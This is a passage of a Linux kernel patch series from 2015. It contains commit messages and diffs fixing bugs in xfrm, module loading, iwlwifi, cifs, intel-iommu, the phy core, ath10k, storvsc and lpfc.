deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 435bc0dc7630..3d264e5e7409 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -700,6 +700,9 @@ static void xfrm_policy_requeue(struct xfrm_policy *old, struct xfrm_policy_queue *pq = &old->polq; struct sk_buff_head list; + if (skb_queue_empty(&pq->hold_queue)) + return; + __skb_queue_head_init(&list); spin_lock_bh(&pq->hold_queue.lock); @@ -708,9 +711,6 @@ static void xfrm_policy_requeue(struct xfrm_policy *old, xfrm_pol_put(old); spin_unlock_bh(&pq->hold_queue.lock); - if (skb_queue_empty(&list)) - return; - pq = &new->polq; spin_lock_bh(&pq->hold_queue.lock); From 37815bf866ab6722a47550f8d25ad3f1a16a680c Mon Sep 17 00:00:00 2001 From: Steven Rostedt Date: Sat, 9 May 2015 03:06:23 +0930 Subject: [PATCH 024/872] module: Call module notifier on failure after complete_formation() The module notifier call chain for MODULE_STATE_COMING was moved up before the parsing of args, into the complete_formation() call. But if the module failed to load after that, the notifier call chain for MODULE_STATE_GOING was never called and that prevented the users of those call chains from cleaning up anything that was allocated. Link: http://lkml.kernel.org/r/554C52B9.9060700@gmail.com Reported-by: Pontus Fuchs Fixes: 4982223e51e8 "module: set nx before marking module MODULE_STATE_COMING" Cc: stable@vger.kernel.org # 3.16+ Signed-off-by: Steven Rostedt Signed-off-by: Rusty Russell --- kernel/module.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/kernel/module.c b/kernel/module.c index 42a1d2afb217..cfc9e843a924 100644 --- a/kernel/module.c +++ b/kernel/module.c @@ -3370,6 +3370,9 @@ static int load_module(struct load_info *info, const char __user *uargs, module_bug_cleanup(mod); mutex_unlock(&module_mutex); + blocking_notifier_call_chain(&module_notify_list, + MODULE_STATE_GOING, mod); + /* we can't deallocate the module until we clear memory protection */ unset_module_init_ro_nx(mod); unset_module_core_ro_nx(mod); From 5f0d98f278f943cb6115b6fe4441f11a7015bb50 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Thu, 30 Oct 2014 10:19:38 +0200 Subject: [PATCH 025/872] iwlwifi: mvm: forbid MIMO on devices that don't support it There are devices that forbid MIMO by the mean of the NVM. Detect thoses devices and forbid MIMO otherwise the firmware would crash. STBC is still allowed on these devices. Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/iwl-eeprom-parse.c | 5 +++++ .../net/wireless/iwlwifi/iwl-eeprom-parse.h | 3 +++ drivers/net/wireless/iwlwifi/iwl-nvm-parse.c | 19 +++++++++++++------ drivers/net/wireless/iwlwifi/mvm/rs.c | 3 +++ 4 files changed, 24 insertions(+), 6 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c index 41ff85de7334..21302b6f2bfd 100644 --- a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.c @@ -6,6 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -31,6 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -748,6 +750,9 @@ void iwl_init_ht_hw_capab(const struct iwl_cfg *cfg, return; } + if (data->sku_cap_mimo_disabled) + rx_chains = 1; + ht_info->ht_supported = true; ht_info->cap = IEEE80211_HT_CAP_DSSSCCK40; diff --git a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h index 5234a0bf11e4..750c8c9ee70d 100644 --- a/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h +++ b/drivers/net/wireless/iwlwifi/iwl-eeprom-parse.h @@ -6,6 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -31,6 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. + * Copyright(c) 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -84,6 +86,7 @@ struct iwl_nvm_data { bool sku_cap_11ac_enable; bool sku_cap_amt_enable; bool sku_cap_ipan_enable; + bool sku_cap_mimo_disabled; u16 radio_cfg_type; u8 radio_cfg_step; diff --git a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c index 83903a5025c2..cf86f3cdbb8e 100644 --- a/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c +++ b/drivers/net/wireless/iwlwifi/iwl-nvm-parse.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -116,10 +116,11 @@ enum family_8000_nvm_offsets { /* SKU Capabilities (actual values from NVM definition) */ enum nvm_sku_bits { - NVM_SKU_CAP_BAND_24GHZ = BIT(0), - NVM_SKU_CAP_BAND_52GHZ = BIT(1), - NVM_SKU_CAP_11N_ENABLE = BIT(2), - NVM_SKU_CAP_11AC_ENABLE = BIT(3), + NVM_SKU_CAP_BAND_24GHZ = BIT(0), + NVM_SKU_CAP_BAND_52GHZ = BIT(1), + NVM_SKU_CAP_11N_ENABLE = BIT(2), + NVM_SKU_CAP_11AC_ENABLE = BIT(3), + NVM_SKU_CAP_MIMO_DISABLE = BIT(5), }; /* @@ -368,6 +369,11 @@ static void iwl_init_vht_hw_capab(const struct iwl_cfg *cfg, if (cfg->ht_params->ldpc) vht_cap->cap |= IEEE80211_VHT_CAP_RXLDPC; + if (data->sku_cap_mimo_disabled) { + num_rx_ants = 1; + num_tx_ants = 1; + } + if (num_tx_ants > 1) vht_cap->cap |= IEEE80211_VHT_CAP_TXSTBC; else @@ -610,6 +616,7 @@ iwl_parse_nvm_data(struct device *dev, const struct iwl_cfg *cfg, data->sku_cap_11n_enable = false; data->sku_cap_11ac_enable = data->sku_cap_11n_enable && (sku & NVM_SKU_CAP_11AC_ENABLE); + data->sku_cap_mimo_disabled = sku & NVM_SKU_CAP_MIMO_DISABLE; data->n_hw_addrs = iwl_get_n_hw_addrs(cfg, nvm_sw); diff --git a/drivers/net/wireless/iwlwifi/mvm/rs.c b/drivers/net/wireless/iwlwifi/mvm/rs.c index f9928f2c125f..33cd68ae7bf9 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rs.c +++ b/drivers/net/wireless/iwlwifi/mvm/rs.c @@ -180,6 +180,9 @@ static bool rs_mimo_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, if (iwl_mvm_vif_low_latency(mvmvif) && mvmsta->vif->p2p) return false; + if (mvm->nvm_data->sku_cap_mimo_disabled) + return false; + return true; } From f5d0684e848f01347ba510545822c205889f8acc Mon Sep 17 00:00:00 2001 From: Sachin Prabhu Date: Thu, 2 Apr 2015 14:51:35 +0100 Subject: [PATCH 026/872] cifs: Don't replace dentries for dfs mounts MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Doing a readdir on a dfs root can result in the dentries for directories with a dfs share mounted being replaced by new dentries for objects returned by the readdir call. These new dentries on shares mounted with unix extenstions show up as symlinks pointing to the dfs share. # mount -t cifs -o sec=none //vm140-31/dfsroot cifs # stat cifs/testlink/testfile; ls -l cifs File: ‘cifs/testlink/testfile’ Size: 0 Blocks: 0 IO Block: 16384 regular empty file Device: 27h/39d Inode: 130120 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2015-03-31 13:55:50.106018200 +0100 Modify: 2015-03-31 13:55:50.106018200 +0100 Change: 2015-03-31 13:55:50.106018200 +0100 Birth: - total 0 drwxr-xr-x 2 root root 0 Mar 31 13:54 testdir lrwxrwxrwx 1 root root 19 Mar 24 14:25 testlink -> \vm140-31\test In the example above, the stat command mounts the dfs share at cifs/testlink. The subsequent ls on the dfsroot directory replaces the dentry for testlink with a symlink. In the earlier code, the d_invalidate command returned an -EBUSY error when attempting to invalidate directories. This stopped the code from replacing the directories with symlinks returned by the readdir call. Changes were recently made to the d_invalidate() command so that it no longer returns an error code. This results in the directory with the mounted dfs share being replaced by a symlink which denotes a dfs share. Signed-off-by: Sachin Prabhu Reviewed-by: Jeff Layton Signed-off-by: Steve French --- fs/cifs/readdir.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/fs/cifs/readdir.c b/fs/cifs/readdir.c index b4a47237486b..b1eede3678a9 100644 --- a/fs/cifs/readdir.c +++ b/fs/cifs/readdir.c @@ -90,6 +90,8 @@ cifs_prime_dcache(struct dentry *parent, struct qstr *name, if (dentry) { inode = d_inode(dentry); if (inode) { + if (d_mountpoint(dentry)) + goto out; /* * If we're generating inode numbers, then we don't * want to clobber the existing one with the one that From bc8ebdc4f54cc944b0ecc0fb0d18b0ffbaab0468 Mon Sep 17 00:00:00 2001 From: Nakajima Akira Date: Fri, 13 Feb 2015 15:35:58 +0900 Subject: [PATCH 027/872] Fix that several functions handle incorrect value of mapchars Cifs client has problem with reserved chars filename. [BUG1] : several functions handle incorrect value of mapchars - cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); [BUG2] : forget to convert reserved chars when creating SymbolicLink. - CIFSUnixCreateSymLink() calls cifs_strtoUTF16 + CIFSUnixCreateSymLink() calls cifsConvertToUTF16() with remap [BUG3] : forget to convert reserved chars when getting SymbolicLink. - CIFSSMBUnixQuerySymLink() calls cifs_strtoUTF16 + CIFSSMBUnixQuerySymLink() calls cifsConvertToUTF16() with remap [BUG4] : /proc/mounts don't show "mapposix" when using mapposix mount option + cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR) + seq_puts(s, ",mapposix"); Reported-by: t.wede@kw-reneg.de Reported-by: Nakajima Akira Signed-off-by: Nakajima Akira Signed-off-by: Carl Schaefer Signed-off-by: Steve French --- fs/cifs/cifs_dfs_ref.c | 3 ++- fs/cifs/cifsfs.c | 2 ++ fs/cifs/cifsproto.h | 4 ++-- fs/cifs/cifssmb.c | 21 +++++++++++---------- fs/cifs/dir.c | 3 +-- fs/cifs/file.c | 3 +-- fs/cifs/inode.c | 6 ++---- fs/cifs/link.c | 3 ++- fs/cifs/smb1ops.c | 3 ++- 9 files changed, 25 insertions(+), 23 deletions(-) diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c index 430e0348c99e..7dc886c9a78f 100644 --- a/fs/cifs/cifs_dfs_ref.c +++ b/fs/cifs/cifs_dfs_ref.c @@ -24,6 +24,7 @@ #include "cifsfs.h" #include "dns_resolve.h" #include "cifs_debug.h" +#include "cifs_unicode.h" static LIST_HEAD(cifs_dfs_automount_list); @@ -312,7 +313,7 @@ static struct vfsmount *cifs_dfs_do_automount(struct dentry *mntpt) xid = get_xid(); rc = get_dfs_path(xid, ses, full_path + 1, cifs_sb->local_nls, &num_referrals, &referrals, - cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); free_xid(xid); cifs_put_tlink(tlink); diff --git a/fs/cifs/cifsfs.c b/fs/cifs/cifsfs.c index f5089bde3635..0a9fb6b53126 100644 --- a/fs/cifs/cifsfs.c +++ b/fs/cifs/cifsfs.c @@ -469,6 +469,8 @@ cifs_show_options(struct seq_file *s, struct dentry *root) seq_puts(s, ",nouser_xattr"); if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR) seq_puts(s, ",mapchars"); + if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR) + seq_puts(s, ",mapposix"); if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL) seq_puts(s, ",sfu"); if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_BRL) diff --git a/fs/cifs/cifsproto.h b/fs/cifs/cifsproto.h index c31ce98c1704..c63fd1dde25b 100644 --- a/fs/cifs/cifsproto.h +++ b/fs/cifs/cifsproto.h @@ -361,11 +361,11 @@ extern int CIFSUnixCreateHardLink(const unsigned int xid, extern int CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, const char *fromName, const char *toName, - const struct nls_table *nls_codepage); + const struct nls_table *nls_codepage, int remap); extern int CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, const unsigned char *searchName, char **syminfo, - const struct nls_table *nls_codepage); + const struct nls_table *nls_codepage, int remap); extern int CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, __u16 fid, char **symlinkinfo, const struct nls_table *nls_codepage); diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c index 84650a51c7c4..1091affba425 100644 --- a/fs/cifs/cifssmb.c +++ b/fs/cifs/cifssmb.c @@ -2784,7 +2784,7 @@ CIFSSMBCopy(const unsigned int xid, struct cifs_tcon *tcon, int CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, const char *fromName, const char *toName, - const struct nls_table *nls_codepage) + const struct nls_table *nls_codepage, int remap) { TRANSACTION2_SPI_REQ *pSMB = NULL; TRANSACTION2_SPI_RSP *pSMBr = NULL; @@ -2804,9 +2804,9 @@ CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) { name_len = - cifs_strtoUTF16((__le16 *) pSMB->FileName, fromName, - /* find define for this maxpathcomponent */ - PATH_MAX, nls_codepage); + cifsConvertToUTF16((__le16 *) pSMB->FileName, fromName, + /* find define for this maxpathcomponent */ + PATH_MAX, nls_codepage, remap); name_len++; /* trailing null */ name_len *= 2; @@ -2828,9 +2828,9 @@ CIFSUnixCreateSymLink(const unsigned int xid, struct cifs_tcon *tcon, data_offset = (char *) (&pSMB->hdr.Protocol) + offset; if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) { name_len_target = - cifs_strtoUTF16((__le16 *) data_offset, toName, PATH_MAX - /* find define for this maxpathcomponent */ - , nls_codepage); + cifsConvertToUTF16((__le16 *) data_offset, toName, + /* find define for this maxpathcomponent */ + PATH_MAX, nls_codepage, remap); name_len_target++; /* trailing null */ name_len_target *= 2; } else { /* BB improve the check for buffer overruns BB */ @@ -3034,7 +3034,7 @@ CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon, int CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, const unsigned char *searchName, char **symlinkinfo, - const struct nls_table *nls_codepage) + const struct nls_table *nls_codepage, int remap) { /* SMB_QUERY_FILE_UNIX_LINK */ TRANSACTION2_QPI_REQ *pSMB = NULL; @@ -3055,8 +3055,9 @@ CIFSSMBUnixQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon, if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) { name_len = - cifs_strtoUTF16((__le16 *) pSMB->FileName, searchName, - PATH_MAX, nls_codepage); + cifsConvertToUTF16((__le16 *) pSMB->FileName, + searchName, PATH_MAX, nls_codepage, + remap); name_len++; /* trailing null */ name_len *= 2; } else { /* BB improve the check for buffer overruns BB */ diff --git a/fs/cifs/dir.c b/fs/cifs/dir.c index 338d56936f6a..c3eb998a99bd 100644 --- a/fs/cifs/dir.c +++ b/fs/cifs/dir.c @@ -620,8 +620,7 @@ int cifs_mknod(struct inode *inode, struct dentry *direntry, umode_t mode, } rc = CIFSSMBUnixSetPathInfo(xid, tcon, full_path, &args, cifs_sb->local_nls, - cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); if (rc) goto mknod_out; diff --git a/fs/cifs/file.c b/fs/cifs/file.c index cafbf10521d5..5cfa7129d876 100644 --- a/fs/cifs/file.c +++ b/fs/cifs/file.c @@ -140,8 +140,7 @@ int cifs_posix_open(char *full_path, struct inode **pinode, posix_flags = cifs_posix_convert_flags(f_flags); rc = CIFSPOSIXCreate(xid, tcon, posix_flags, mode, pnetfid, presp_data, poplock, full_path, cifs_sb->local_nls, - cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); cifs_put_tlink(tlink); if (rc) diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c index 55b58112d122..ef71aa1515f6 100644 --- a/fs/cifs/inode.c +++ b/fs/cifs/inode.c @@ -373,8 +373,7 @@ int cifs_get_inode_info_unix(struct inode **pinode, /* could have done a find first instead but this returns more info */ rc = CIFSSMBUnixQPathInfo(xid, tcon, full_path, &find_data, - cifs_sb->local_nls, cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_sb->local_nls, cifs_remap(cifs_sb)); cifs_put_tlink(tlink); if (!rc) { @@ -2215,8 +2214,7 @@ cifs_setattr_unix(struct dentry *direntry, struct iattr *attrs) pTcon = tlink_tcon(tlink); rc = CIFSSMBUnixSetPathInfo(xid, pTcon, full_path, args, cifs_sb->local_nls, - cifs_sb->mnt_cifs_flags & - CIFS_MOUNT_MAP_SPECIAL_CHR); + cifs_remap(cifs_sb)); cifs_put_tlink(tlink); } diff --git a/fs/cifs/link.c b/fs/cifs/link.c index 252e672d5604..e6c707cc62b3 100644 --- a/fs/cifs/link.c +++ b/fs/cifs/link.c @@ -717,7 +717,8 @@ cifs_symlink(struct inode *inode, struct dentry *direntry, const char *symname) rc = create_mf_symlink(xid, pTcon, cifs_sb, full_path, symname); else if (pTcon->unix_ext) rc = CIFSUnixCreateSymLink(xid, pTcon, full_path, symname, - cifs_sb->local_nls); + cifs_sb->local_nls, + cifs_remap(cifs_sb)); /* else rc = CIFSCreateReparseSymLink(xid, pTcon, fromName, toName, cifs_sb_target->local_nls); */ diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c index 7bfdd6066276..fc537c29044e 100644 --- a/fs/cifs/smb1ops.c +++ b/fs/cifs/smb1ops.c @@ -960,7 +960,8 @@ cifs_query_symlink(const unsigned int xid, struct cifs_tcon *tcon, /* Check for unix extensions */ if (cap_unix(tcon->ses)) { rc = CIFSSMBUnixQuerySymLink(xid, tcon, full_path, target_path, - cifs_sb->local_nls); + cifs_sb->local_nls, + cifs_remap(cifs_sb)); if (rc == -EREMOTE) rc = cifs_unix_dfs_readlink(xid, tcon, full_path, target_path, From 4ed6a540fab8ea4388c1703b73ecfed68a2009d1 Mon Sep 17 00:00:00 2001 From: David Woodhouse Date: Mon, 11 May 2015 14:59:20 +0100 Subject: [PATCH 028/872] iommu/vt-d: Fix passthrough mode with translation-disabled devices When we use 'intel_iommu=igfx_off' to disable translation for the graphics, and when we discover that the BIOS has misconfigured the DMAR setup for I/OAT, we use a special DUMMY_DEVICE_DOMAIN_INFO value in dev->archdata.iommu to indicate that translation is disabled. With passthrough mode, we were attempting to dereference that as a normal pointer to a struct device_domain_info when setting up an identity mapping for the affected device. This fixes the problem by making device_to_iommu() explicitly check for the special value and indicate that no IOMMU was found to handle the devices in question. Signed-off-by: David Woodhouse Cc: stable@vger.kernel.org (which means you can pick up 18436afdc now too) --- drivers/iommu/intel-iommu.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/iommu/intel-iommu.c b/drivers/iommu/intel-iommu.c index 68d43beccb7e..2ffe58969944 100644 --- a/drivers/iommu/intel-iommu.c +++ b/drivers/iommu/intel-iommu.c @@ -696,6 +696,11 @@ static inline struct context_entry *iommu_context_addr(struct intel_iommu *iommu return &context[devfn]; } +static int iommu_dummy(struct device *dev) +{ + return dev->archdata.iommu == DUMMY_DEVICE_DOMAIN_INFO; +} + static struct intel_iommu *device_to_iommu(struct device *dev, u8 *bus, u8 *devfn) { struct dmar_drhd_unit *drhd = NULL; @@ -705,6 +710,9 @@ static struct intel_iommu *device_to_iommu(struct device *dev, u8 *bus, u8 *devf u16 segment = 0; int i; + if (iommu_dummy(dev)) + return NULL; + if (dev_is_pci(dev)) { pdev = to_pci_dev(dev); segment = pci_domain_nr(pdev->bus); @@ -2969,11 +2977,6 @@ static inline struct dmar_domain *get_valid_domain_for_dev(struct device *dev) return __get_valid_domain_for_dev(dev); } -static int iommu_dummy(struct device *dev) -{ - return dev->archdata.iommu == DUMMY_DEVICE_DOMAIN_INFO; -} - /* Check if the dev needs to go through non-identity map and unmap process.*/ static int iommu_no_mapping(struct device *dev) { From f83be4c3f69762e1fc736e375b04e5c22b3ddceb Mon Sep 17 00:00:00 2001 From: Axel Lin Date: Wed, 8 Apr 2015 07:30:15 +0800 Subject: [PATCH 029/872] phy: core: Fix error checking in (devm_)phy_optional_get Don't pass valid pointer to PTR_ERR, use PTR_ERR(phy) only when IS_ERR(phy) is true. Signed-off-by: Axel Lin Signed-off-by: Kishon Vijay Abraham I --- drivers/phy/phy-core.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/phy/phy-core.c b/drivers/phy/phy-core.c index 3791838f4bd4..63bc12d7a73e 100644 --- a/drivers/phy/phy-core.c +++ b/drivers/phy/phy-core.c @@ -530,7 +530,7 @@ struct phy *phy_optional_get(struct device *dev, const char *string) { struct phy *phy = phy_get(dev, string); - if (PTR_ERR(phy) == -ENODEV) + if (IS_ERR(phy) && (PTR_ERR(phy) == -ENODEV)) phy = NULL; return phy; @@ -584,7 +584,7 @@ struct phy *devm_phy_optional_get(struct device *dev, const char *string) { struct phy *phy = devm_phy_get(dev, string); - if (PTR_ERR(phy) == -ENODEV) + if (IS_ERR(phy) && (PTR_ERR(phy) == -ENODEV)) phy = NULL; return phy; From 184a394eea16d61b85444c73349ced7f91f79af2 Mon Sep 17 00:00:00 2001 From: Peter Oh Date: Mon, 4 May 2015 11:21:24 -0700 Subject: [PATCH 030/872] ath10k: increase relay buffer size of spectral scan Spectral scan supported by ath10k has capability to monitor and report through whole bands and channels, but current buffer size is too small to save reported spectral scan data. This results in dropping 5G channel reports at all when dual band card is used, so that users are not able to analyze spectral environments. Hence increase the buffer size to fix the problem. A spectral data size is vary based on the number of bins, so the unit buffer size, 1140, is chose to minimize relay buffer fragmentation. The total buffer size is also chose in tradeoff with spectral scan support vs. kernel memory consumption. Since theoretical maximum buffer size, 9.5MB, can be consumed with 512 bins in dual bands, we target to cover up to 128 bins for all channels in dual bands and due to the buffer size limitation, spectral scan with bin number bigger than 128 needs to be run on single band each. Signed-off-by: Peter Oh Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/spectral.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/ath10k/spectral.c b/drivers/net/wireless/ath/ath10k/spectral.c index d22addf6118b..8dcd424aa502 100644 --- a/drivers/net/wireless/ath/ath10k/spectral.c +++ b/drivers/net/wireless/ath/ath10k/spectral.c @@ -519,9 +519,12 @@ int ath10k_spectral_vif_stop(struct ath10k_vif *arvif) int ath10k_spectral_create(struct ath10k *ar) { + /* The buffer size covers whole channels in dual bands up to 128 bins. + * Scan with bigger than 128 bins needs to be run on single band each. + */ ar->spectral.rfs_chan_spec_scan = relay_open("spectral_scan", ar->debug.debugfs_phy, - 1024, 256, + 1140, 2500, &rfs_spec_scan_cb, NULL); debugfs_create_file("spectral_scan_ctl", S_IRUSR | S_IWUSR, From 2c2d2fafe21652789437e5a1a8b2770a45adc259 Mon Sep 17 00:00:00 2001 From: Vasanthakumar Thiagarajan Date: Tue, 5 May 2015 18:00:48 +0530 Subject: [PATCH 031/872] ath10k: fix survey information reporting Rx clear count reported in wmi_chan_info_event is actually channel_busy_count not rx_frame_count. Send rx_clear_count through time_busy of survey_info and set SURVEY_INFO_TIME_BUSY in filled. iw wlan0 survey dump urvey data from wlan0 frequency: 5180 MHz [in use] noise: -103 dBm channel active time: 150 ms channel busy time: 22 ms Survey data from wlan0 frequency: 5200 MHz noise: -102 dBm channel active time: 146 ms channel busy time: 0 ms Signed-off-by: Vasanthakumar Thiagarajan Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/wmi.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/wmi.c b/drivers/net/wireless/ath/ath10k/wmi.c index ebaa096cf200..0fabe689179c 100644 --- a/drivers/net/wireless/ath/ath10k/wmi.c +++ b/drivers/net/wireless/ath/ath10k/wmi.c @@ -1645,10 +1645,10 @@ void ath10k_wmi_event_chan_info(struct ath10k *ar, struct sk_buff *skb) survey = &ar->survey[idx]; survey->time = WMI_CHAN_INFO_MSEC(cycle_count); - survey->time_rx = WMI_CHAN_INFO_MSEC(rx_clear_count); + survey->time_busy = WMI_CHAN_INFO_MSEC(rx_clear_count); survey->noise = noise_floor; survey->filled = SURVEY_INFO_TIME | - SURVEY_INFO_TIME_RX | + SURVEY_INFO_TIME_BUSY | SURVEY_INFO_NOISE_DBM; } From dc45708ca9988656d706940df5fd102672c5de92 Mon Sep 17 00:00:00 2001 From: "K. Y. Srinivasan" Date: Fri, 1 May 2015 11:03:02 -0700 Subject: [PATCH 032/872] storvsc: Set the SRB flags correctly when no data transfer is needed Set the SRB flags correctly when there is no data transfer. Without this change some IHV drivers will fail valid commands such as TEST_UNIT_READY. Cc: Signed-off-by: K. Y. Srinivasan Reviewed-by: Long Li Signed-off-by: James Bottomley --- drivers/scsi/storvsc_drv.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c index d9dad90344d5..3c6584ff65c1 100644 --- a/drivers/scsi/storvsc_drv.c +++ b/drivers/scsi/storvsc_drv.c @@ -1600,8 +1600,7 @@ static int storvsc_queuecommand(struct Scsi_Host *host, struct scsi_cmnd *scmnd) break; default: vm_srb->data_in = UNKNOWN_TYPE; - vm_srb->win8_extension.srb_flags |= (SRB_FLAGS_DATA_IN | - SRB_FLAGS_DATA_OUT); + vm_srb->win8_extension.srb_flags |= SRB_FLAGS_NO_DATA_TRANSFER; break; } From 8b2564ec7410928639db5c09a34d7d8330f1d759 Mon Sep 17 00:00:00 2001 From: Alexey Kardashevskiy Date: Tue, 28 Apr 2015 18:26:22 +1000 Subject: [PATCH 033/872] lpfc: Fix breakage on big endian kernels This reverts 4fbdf9cb it breaks LPFC on POWER7 machine, big endian kernel. Without this, the kernel enters an infinite oops loop. This is the hardware used for verification: 0005:01:00.0 Fibre Channel [0c04]: Emulex Corporation Saturn-X: LightPulse Fibre Channel Host Adapter [10df:f100] (rev 03) 0005:01:00.1 Fibre Channel [0c04]: Emulex Corporation Saturn-X: LightPulse Fibre Channel Host Adapter [10df:f100] (rev 03) Signed-off-by: Alexey Kardashevskiy Reviewed-by: James Smart Signed-off-by: James Bottomley --- drivers/scsi/lpfc/lpfc_scsi.c | 41 ++++++++++++++++++----------------- 1 file changed, 21 insertions(+), 20 deletions(-) diff --git a/drivers/scsi/lpfc/lpfc_scsi.c b/drivers/scsi/lpfc/lpfc_scsi.c index cb73cf9e9ba5..c140f99772ca 100644 --- a/drivers/scsi/lpfc/lpfc_scsi.c +++ b/drivers/scsi/lpfc/lpfc_scsi.c @@ -1129,25 +1129,6 @@ lpfc_release_scsi_buf(struct lpfc_hba *phba, struct lpfc_scsi_buf *psb) phba->lpfc_release_scsi_buf(phba, psb); } -/** - * lpfc_fcpcmd_to_iocb - copy the fcp_cmd data into the IOCB - * @data: A pointer to the immediate command data portion of the IOCB. - * @fcp_cmnd: The FCP Command that is provided by the SCSI layer. - * - * The routine copies the entire FCP command from @fcp_cmnd to @data while - * byte swapping the data to big endian format for transmission on the wire. - **/ -static void -lpfc_fcpcmd_to_iocb(uint8_t *data, struct fcp_cmnd *fcp_cmnd) -{ - int i, j; - - for (i = 0, j = 0; i < sizeof(struct fcp_cmnd); - i += sizeof(uint32_t), j++) { - ((uint32_t *)data)[j] = cpu_to_be32(((uint32_t *)fcp_cmnd)[j]); - } -} - /** * lpfc_scsi_prep_dma_buf_s3 - DMA mapping for scsi buffer to SLI3 IF spec * @phba: The Hba for which this call is being executed. @@ -1283,7 +1264,6 @@ lpfc_scsi_prep_dma_buf_s3(struct lpfc_hba *phba, struct lpfc_scsi_buf *lpfc_cmd) * we need to set word 4 of IOCB here */ iocb_cmd->un.fcpi.fcpi_parm = scsi_bufflen(scsi_cmnd); - lpfc_fcpcmd_to_iocb(iocb_cmd->unsli3.fcp_ext.icd, fcp_cmnd); return 0; } @@ -4146,6 +4126,24 @@ lpfc_scsi_cmd_iocb_cmpl(struct lpfc_hba *phba, struct lpfc_iocbq *pIocbIn, lpfc_release_scsi_buf(phba, lpfc_cmd); } +/** + * lpfc_fcpcmd_to_iocb - copy the fcp_cmd data into the 